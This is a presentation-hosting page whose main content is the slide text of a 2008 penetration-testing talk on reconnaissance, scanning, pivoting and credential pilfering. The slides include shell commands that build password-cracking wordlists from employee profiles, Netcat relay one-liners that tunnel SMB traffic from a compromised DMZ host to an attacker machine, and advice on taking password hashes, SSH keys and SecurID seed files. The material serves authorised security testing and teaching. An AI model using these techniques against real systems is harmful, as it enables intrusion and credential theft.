Kali net hunter
Kali net hunterKali net hunter
Kali net hunter
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Similar to Secrets of Top Pentesters

Secure Programming With Static Analysis
Secure Programming With Static AnalysisSecure Programming With Static Analysis
Secure Programming With Static AnalysisConSanFrancisco123
 
High-Octane Dev Teams: Three Things You Can Do To Improve Code Quality
High-Octane Dev Teams: Three Things You Can Do To Improve Code QualityHigh-Octane Dev Teams: Three Things You Can Do To Improve Code Quality
High-Octane Dev Teams: Three Things You Can Do To Improve Code QualityAtlassian
 
Multi Core Playground
Multi Core PlaygroundMulti Core Playground
Multi Core PlaygroundESUG
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamerJorge Orchilles
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Appsadunne
 
Os Leventhal
Os LeventhalOs Leventhal
Os Leventhaloscon2007
 
Performance, Games, and Distributed Testing in JavaScript
Performance, Games, and Distributed Testing in JavaScriptPerformance, Games, and Distributed Testing in JavaScript
Performance, Games, and Distributed Testing in JavaScriptjeresig
 
Static Analysis Techniques For Testing Application Security - Houston Tech Fest
Static Analysis Techniques For Testing Application Security - Houston Tech FestStatic Analysis Techniques For Testing Application Security - Houston Tech Fest
Static Analysis Techniques For Testing Application Security - Houston Tech FestDenim Group
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
Designing and Attacking DRM (RSA 2008)
Designing and Attacking DRM (RSA 2008)Designing and Attacking DRM (RSA 2008)
Designing and Attacking DRM (RSA 2008)Nate Lawson
 
Peer Code Review: In a Nutshell and The Tantric Team: Getting Your Automated ...
Peer Code Review: In a Nutshell and The Tantric Team: Getting Your Automated ...Peer Code Review: In a Nutshell and The Tantric Team: Getting Your Automated ...
Peer Code Review: In a Nutshell and The Tantric Team: Getting Your Automated ...Atlassian
 
Securing Rails
Securing RailsSecuring Rails
Securing RailsAlex Payne
 
Just In Time Scalability Agile Methods To Support Massive Growth Presentation
Just In Time Scalability  Agile Methods To Support Massive Growth PresentationJust In Time Scalability  Agile Methods To Support Massive Growth Presentation
Just In Time Scalability Agile Methods To Support Massive Growth PresentationLong Nguyen
 
When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)Nate Lawson
 
How the JDeveloper team test JDeveloper at UKOUG'08
How the JDeveloper team test JDeveloper at UKOUG'08How the JDeveloper team test JDeveloper at UKOUG'08
How the JDeveloper team test JDeveloper at UKOUG'08kingsfleet
 
The Most Important Thing: How Mozilla Does Security and What You Can Steal
The Most Important Thing: How Mozilla Does Security and What You Can StealThe Most Important Thing: How Mozilla Does Security and What You Can Steal
The Most Important Thing: How Mozilla Does Security and What You Can Stealmozilla.presentations
 
New School Man-in-the-Middle
New School Man-in-the-MiddleNew School Man-in-the-Middle
New School Man-in-the-MiddleTom Eston
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 

Similar to Secrets of Top Pentesters (20)

Secure Programming With Static Analysis
Secure Programming With Static AnalysisSecure Programming With Static Analysis
Secure Programming With Static Analysis
 
High-Octane Dev Teams: Three Things You Can Do To Improve Code Quality
High-Octane Dev Teams: Three Things You Can Do To Improve Code QualityHigh-Octane Dev Teams: Three Things You Can Do To Improve Code Quality
High-Octane Dev Teams: Three Things You Can Do To Improve Code Quality
 
Multi Core Playground
Multi Core PlaygroundMulti Core Playground
Multi Core Playground
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Apps
 
Os Leventhal
Os LeventhalOs Leventhal
Os Leventhal
 
Performance, Games, and Distributed Testing in JavaScript
Performance, Games, and Distributed Testing in JavaScriptPerformance, Games, and Distributed Testing in JavaScript
Performance, Games, and Distributed Testing in JavaScript
 
Static Analysis Techniques For Testing Application Security - Houston Tech Fest
Static Analysis Techniques For Testing Application Security - Houston Tech FestStatic Analysis Techniques For Testing Application Security - Houston Tech Fest
Static Analysis Techniques For Testing Application Security - Houston Tech Fest
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
 
Designing and Attacking DRM (RSA 2008)
Designing and Attacking DRM (RSA 2008)Designing and Attacking DRM (RSA 2008)
Designing and Attacking DRM (RSA 2008)
 
Peer Code Review: In a Nutshell and The Tantric Team: Getting Your Automated ...
Peer Code Review: In a Nutshell and The Tantric Team: Getting Your Automated ...Peer Code Review: In a Nutshell and The Tantric Team: Getting Your Automated ...
Peer Code Review: In a Nutshell and The Tantric Team: Getting Your Automated ...
 
Securing Rails
Securing RailsSecuring Rails
Securing Rails
 
Just In Time Scalability Agile Methods To Support Massive Growth Presentation
Just In Time Scalability  Agile Methods To Support Massive Growth PresentationJust In Time Scalability  Agile Methods To Support Massive Growth Presentation
Just In Time Scalability Agile Methods To Support Massive Growth Presentation
 
When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)
 
How the JDeveloper team test JDeveloper at UKOUG'08
How the JDeveloper team test JDeveloper at UKOUG'08How the JDeveloper team test JDeveloper at UKOUG'08
How the JDeveloper team test JDeveloper at UKOUG'08
 
Desk Maintenance
Desk MaintenanceDesk Maintenance
Desk Maintenance
 
The Most Important Thing: How Mozilla Does Security and What You Can Steal
The Most Important Thing: How Mozilla Does Security and What You Can StealThe Most Important Thing: How Mozilla Does Security and What You Can Steal
The Most Important Thing: How Mozilla Does Security and What You Can Steal
 
New School Man-in-the-Middle
New School Man-in-the-MiddleNew School Man-in-the-Middle
New School Man-in-the-Middle
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 

More from amiable_indian

State of Cyber Law in India
State of Cyber Law in IndiaState of Cyber Law in India
State of Cyber Law in Indiaamiable_indian
 
AntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyAntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyamiable_indian
 
Reverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure CodingReverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure Codingamiable_indian
 
Network Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons LearnedNetwork Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons Learnedamiable_indian
 
Economic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds DissectedEconomic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds Dissectedamiable_indian
 
Immune IT: Moving from Security to Immunity
Immune IT: Moving from Security to ImmunityImmune IT: Moving from Security to Immunity
Immune IT: Moving from Security to Immunityamiable_indian
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writersamiable_indian
 
Web Exploit Finder Presentation
Web Exploit Finder PresentationWeb Exploit Finder Presentation
Web Exploit Finder Presentationamiable_indian
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualizationamiable_indian
 
Enhancing Computer Security via End-to-End Communication Visualization
Enhancing Computer Security via End-to-End Communication Visualization Enhancing Computer Security via End-to-End Communication Visualization
Enhancing Computer Security via End-to-End Communication Visualization amiable_indian
 
Top Network Vulnerabilities Over Time
Top Network Vulnerabilities Over TimeTop Network Vulnerabilities Over Time
Top Network Vulnerabilities Over Timeamiable_indian
 
What are the Business Security Metrics?
What are the Business Security Metrics? What are the Business Security Metrics?
What are the Business Security Metrics? amiable_indian
 
Advanced Ajax Security
Advanced Ajax SecurityAdvanced Ajax Security
Advanced Ajax Securityamiable_indian
 
Network Performance Forecasting System
Network Performance Forecasting SystemNetwork Performance Forecasting System
Network Performance Forecasting Systemamiable_indian
 
Leading Indicators in Information Security
Leading Indicators in Information SecurityLeading Indicators in Information Security
Leading Indicators in Information Securityamiable_indian
 
Security Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA EnvironmentsSecurity Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA Environmentsamiable_indian
 
Fast flux hosting and DNS
Fast flux hosting and DNSFast flux hosting and DNS
Fast flux hosting and DNSamiable_indian
 
A Practical Approach to Managing Information System Risk
A Practical Approach to Managing Information System RiskA Practical Approach to Managing Information System Risk
A Practical Approach to Managing Information System Riskamiable_indian
 

More from amiable_indian (20)

State of Cyber Law in India
State of Cyber Law in IndiaState of Cyber Law in India
State of Cyber Law in India
 
AntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyAntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the ugly
 
Reverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure CodingReverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure Coding
 
Network Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons LearnedNetwork Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons Learned
 
Economic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds DissectedEconomic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds Dissected
 
Immune IT: Moving from Security to Immunity
Immune IT: Moving from Security to ImmunityImmune IT: Moving from Security to Immunity
Immune IT: Moving from Security to Immunity
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
 
Web Exploit Finder Presentation
Web Exploit Finder PresentationWeb Exploit Finder Presentation
Web Exploit Finder Presentation
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
 
Enhancing Computer Security via End-to-End Communication Visualization
Enhancing Computer Security via End-to-End Communication Visualization Enhancing Computer Security via End-to-End Communication Visualization
Enhancing Computer Security via End-to-End Communication Visualization
 
Top Network Vulnerabilities Over Time
Top Network Vulnerabilities Over TimeTop Network Vulnerabilities Over Time
Top Network Vulnerabilities Over Time
 
What are the Business Security Metrics?
What are the Business Security Metrics? What are the Business Security Metrics?
What are the Business Security Metrics?
 
Advanced Ajax Security
Advanced Ajax SecurityAdvanced Ajax Security
Advanced Ajax Security
 
Network Performance Forecasting System
Network Performance Forecasting SystemNetwork Performance Forecasting System
Network Performance Forecasting System
 
Leading Indicators in Information Security
Leading Indicators in Information SecurityLeading Indicators in Information Security
Leading Indicators in Information Security
 
Ferret - Data Seepage
Ferret - Data SeepageFerret - Data Seepage
Ferret - Data Seepage
 
SCADA Security
SCADA SecuritySCADA Security
SCADA Security
 
Security Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA EnvironmentsSecurity Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA Environments
 
Fast flux hosting and DNS
Fast flux hosting and DNSFast flux hosting and DNS
Fast flux hosting and DNS
 
A Practical Approach to Managing Information System Risk
A Practical Approach to Managing Information System RiskA Practical Approach to Managing Information System Risk
A Practical Approach to Managing Information System Risk
 

Recently uploaded

Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?SANGHEE SHIN
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Babel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxBabel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxYounusS2
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum ComputingGDSC PJATK
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 

Recently uploaded (20)

Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Babel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxBabel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptx
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum Computing
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 

Secrets of Top Pentesters

  • 1. Title: Secrets of America’s Top Pen Testers Subtitle: I Didn’t Come Up With That Title By Ed Skoudis Copyright 2008, All Rights Reserved Version 4Q08 Pen Test Secrets - ©2008, All Rights Reserved 1 Outline •  Introduction •  Recon-related tips •  Scanning-related tips •  Network-related tips •  Password-related tips •  Reporting-related tips •  Conclusions Pen Test Secrets - ©2008, All Rights Reserved 2 1
  • 2. Introduction and Goals •  Penetration testing is a growing field •  While there are standardized methodologies, many aspects of the penetration tester’s job involve art and improvisation •  The purpose of this presentation is to discuss some of the improvisation that our team has done in recent tests… –  So that you can directly use these concepts and techniques in your own testing regimen –  To give you a sense of what kinds of improvisation pen testers are often called on to do –  To solicit nifty ideas from you… I’ll show you mine if you show me yours Pen Test Secrets - ©2008, All Rights Reserved 3 Over-Arching Theme •  Pen testing isn’t all about zero-day exploits –  Don’t get me wrong… I love a good sploit as much as the next guy •  Instead, it is often about using everyday tools and techniques in creative ways to try to find and exploit security flaws –  The overall goals of most penetration tests are… •  To identify vulnerabilities •  To determine the business risk posed by their exploit, and, •  To devise tactics and strategies for mitigation Pen Test Secrets - ©2008, All Rights Reserved 4 2
  • 3. About the Tips •  Each tip covers a technique that has helped us: 1) Save time, or… 2) Pull off a hack we otherwise could not have accomplished, or… 3) Have a bigger impact in helping the target organization recognize its risk and improve its security stance –  These are not mutually exclusive at all, given finite pen testing timeframes, scope, and resources •  Also, each tip is associated with one or more meta-tips –  Tip: Here’s a technique we use to accomplish more –  Meta-tip: Here are the tools we use for each technique Pen Test Secrets - ©2008, All Rights Reserved 5 Tip 1) Social Networking Sites Are Your Friends •  Social networking sites have exploded –  Especially among younger employees, more willing to share information about themselves •  A treasure-trove of information –  Employers, current and previous –  Technical skills, including product familiarity –  Relationships between people –  Interests, hobbies, likes, dislikes, etc. •  So, what can you do with these? Pen Test Secrets - ©2008, All Rights Reserved 6 3
  • 4. Tip 1) Using Social Networking Sites •  During recon, use social networking sites to determine technologies in use –  At sites like LinkedIn, look at people’s stated skills and areas of expertise •  Determine the relationship between people –  Useful in social engineering penetration tests –  Fred knows Mary… we can use that info to exploit them •  From more personal social networking sites, look at the interests and passions of specific people, allowed for in the project scope –  What are their hobbies? Sports? Star Trek? Pen Test Secrets - ©2008, All Rights Reserved 7 Tip 1) Build Password Guessing and Cracking Dictionaries •  From social networking site pages associated with employees, build custom dictionaries for use in password guessing and cracking •  Grab appropriate profile pages, and save them into a directory, such as “profiles” •  Then, run: $ grep –h –r quot;quot; profiles | tr '[:space:]' 'n' | sort | uniq > wordlist.lst •  Trim the list to remove HTML cruft with stuff like: $ grep –v '<' wordlist.lst > newlist.lst •  Use that custom wordlist in THC Hydra for password guessing and John the Ripper for password cracking Pen Test Secrets - ©2008, All Rights Reserved 8 4
  • 5. Tip 2) Filtering a Scan in Progress Testing •  Scenario: Our team was conducting an Machine internal pen test of a financial services firm –  We were using a QualysGuard Scanner Appliance to scan large numbers of class-B sized networks –  Full scan would take many days –  2 days into scan, we noticed that the scan was crashing some backup servers when they were Bridging Firewall accessed on a specific TCP port Internal •  Let’s call it “Port X” because… ummm… there seems to be an undocumented, possibly exploitable, vulnerability there Network –  We paused the scan, of course .. •  Our goal: Reconfigure the scan and start it again… Nice idea, right? Pen Test Secrets - ©2008, All Rights Reserved 9 Tip 2) Transparent Bridging Firewalls •  Unfortunately, there appeared to be no Qualys function Testing for reconfiguring and restarting a scan Machine •  We even called Qualys support to ask them if this was possible… –  They suggested that we stop, reconfigure, and start the scan again… from the beginning! •  That would have been a huge waste of very expensive on-site time Bridging Firewall •  Another problem: We were allowed to have only one Internal source IP address –  Altering it would have been a big problem – going through Network .. change control, etc. .. .. –  Routing and NAT were also problematic •  Solution: Deploy a dual home FreeBSD box, configured as a transparent, bridging firewall, filtering TCP Port X Pen Test Secrets - ©2008, All Rights Reserved 10 5
  • 6. Tip 3) Dealing with Very Large Scans •  Scenario: We are often called upon to scan large numbers of machines –  Client: “Can you scan all 65,536 TCP and UDP ports on 10,000 machines?” –  “Oh, and we silently reject packets to closed ports.” –  With 1 second per port, that’s 1.3 billion seconds –  Us: “Yes, it’ll take 15,170 days, give or take.” –  That’s 41 years… check 100 ports in parallel? Still too much time… 5 months •  How can we go faster? Pen Test Secrets - ©2008, All Rights Reserved 11 Tip 3) Some Options •  There are numerous approaches for dealing with very large scans 1) Sample a subset of target machines – Limited – How representative is the sample? 2) Sample target ports – Limited – What about non-standard ports and backdoor listeners? 3) Lower time-outs on non-responsive ports – false negative possibilities 4) Move closer to targets – more expensive, and doesn’t really lower time _that_ much 5) Tweak firewall rules to send RESETs and ICMP Port Unreachable messages from closed ports – Ugh! Reconfig to measure behavior? 6) Use hyper-fast port scanning methods (Kaminsky’s ScanRand with separate SYN sender and SYN-ACK receiver eliminating wait state) – TCP only, plus, watch out! You could DoS yourself! Pen Test Secrets - ©2008, All Rights Reserved 12 6
  • 7. Tip 3) An Approach We Use A Lot - Review Firewall Rules •  Review network firewall ruleset and measure only those ports that could reasonably make it through the firewall –  In effect, this is part configuration review and part port scan –  Overcomes the downsides of only sampling targets or sampling specific ports •  By sampling ports on a more intelligent basis –  Often a very effective approach, but doesn’t measure potential firewall bugs •  And requires more work from target organization personnel •  Also, doesn’t lend itself to a black-box approach Pen Test Secrets - ©2008, All Rights Reserved 13 Tip 4) More Flexible Pivoting with Netcat Gender Benders •  Scenario: Suppose you have a penetration test like this: DMZ Linux Box Internet Target Pen Tester Network Firewall Infrastructure Juicy Internal System •  Suppose you get non-root shell on DMZ Linux box •  Suppose also that you want to run Windows client software on your machine (psexec? fgdump? net use?) against juicy internal machine •  We want really flexible pivoting – Pivot mercilessly during a pen test Pen Test Secrets - ©2008, All Rights Reserved 14 7
  • 8. Tip 4) In Other Words (or Picts) You’ve [user@linux ~]: $ got shell You are DMZ here, but here Linux not UID 0 Box Internet Target Pen Tester Network Firewall Infrastructure Client that connects Juicy Internal System to TCP 445, such as “net use” fgdump, psexec, Metasploit, etc. Listening service You want to on TCP 445 make SMB connection to here Pen Test Secrets - ©2008, All Rights Reserved 15 Tip 4) The Answer? Nope… •  The answer is easy, you say… •  Just use a Netcat relay on the DMZ Linux Box $ mknod backpipe p DMZ Linux Box $ nc -nvlp 445 0<backpipe | Listen nc -nv juicy.internal.system Attacker on TCP shell 445 | tee backpipe 445 Netcat •  Problem: You can’t listener | pipe reconfigure iptables on backpipe Netcat DMZ Linux box to allow client inbound 445 Connect to –  No UID 0 and rules of engagement may not allow TCP 445 Pen Test Secrets - ©2008, All Rights Reserved 16 8
  • 9. Tip 4) A Better Answer… Netcat Gender Bender Relays •  Who says Netcat relays have Connect to Netcat TCP 80 to be listener-to-client? client 2 DMZ Linux •  What about client-to-client? | pipe backpipe2 System Netcat •  What about listener-to- client Connect to listener? TCP 445 Internet Target Pen Tester Network 3 Firewall Infrastructure Listen Juicy Internal System Netcat on TCP 445 listener Listening service Attacker’s Own 1 | pipe on TCP 445 Linux System backpipe1 Netcat Listen on TCP listener 80 Pen Test Secrets - ©2008, All Rights Reserved 17 Tip 4) The Commands •  On the Attacker’s own system, run a listener-to-listener relay Listen Netcat on TCP $ mknod backpipe1 p 445 listener Attacker’s Own | pipe $ nc –nvlp 445 0<backpipe1 | backpipe1 Linux System Netcat (attacker.linux) nc –nvlp 80 | tee Listen on TCP listener backpipe1 80 •  On the DMZ Linux system, run a client-to-client relay $ mknod backpipe2 p Connect to Netcat TCP 80 $ nc -nv client DMZ Linux juicy.internal.system | pipe backpipe2 System 445 0<backpipe2 | nc –nv Netcat attacker.linux 80 | tee client Connect to TCP 445 backpipe2 Pen Test Secrets - ©2008, All Rights Reserved 18 9
  • 10. Tip 4) Now, Run Any Windows Client App to Access Juicy Target Connect to Netcat TCP 80 client C:> net use * Linuxc$ DMZ Linux | pipe backpipe System C:> psexec Linux cmd.exe Netcat C:> fgdump –h Linux client Connect to TCP 445 Internet Target Pen Tester Network Firewall Infrastructure Listen Juicy Internal System Netcat on TCP 445 listener Listening service Attacker’s Own | pipe on TCP 445 Linux System backpipe Netcat Looks ugly? Yes, but, man, Listen on TCP listener is it useful! 80 Pen Test Secrets - ©2008, All Rights Reserved 19 Tip 5) Local Pilfering Is Your Friend •  When you compromise a machine, pilfer its information resources as much as possible –  Verify that such pilfering is allowed in rules of engagement •  What to grab? –  Password representations •  Unix/Linux: /etc/passwd and /etc/shadow or variants •  Windows: SAM database and cached credentials using fgdump, or at least currently logged on user’s credentials (using whosthere.exe…more on that later) –  Crypto keys •  SSH keys for ssh clients and sshd – public and private keys •  PGP and GnuPG keys – public and secret rings (check rules of engagement) –  RSA SecureID Authentication Manager server seed files (.asc) for tokens (Good idea, Bryce!) •  With these files, Cain can calculate tokens’ display at arbitrary points in the future Pen Test Secrets - ©2008, All Rights Reserved 20 10
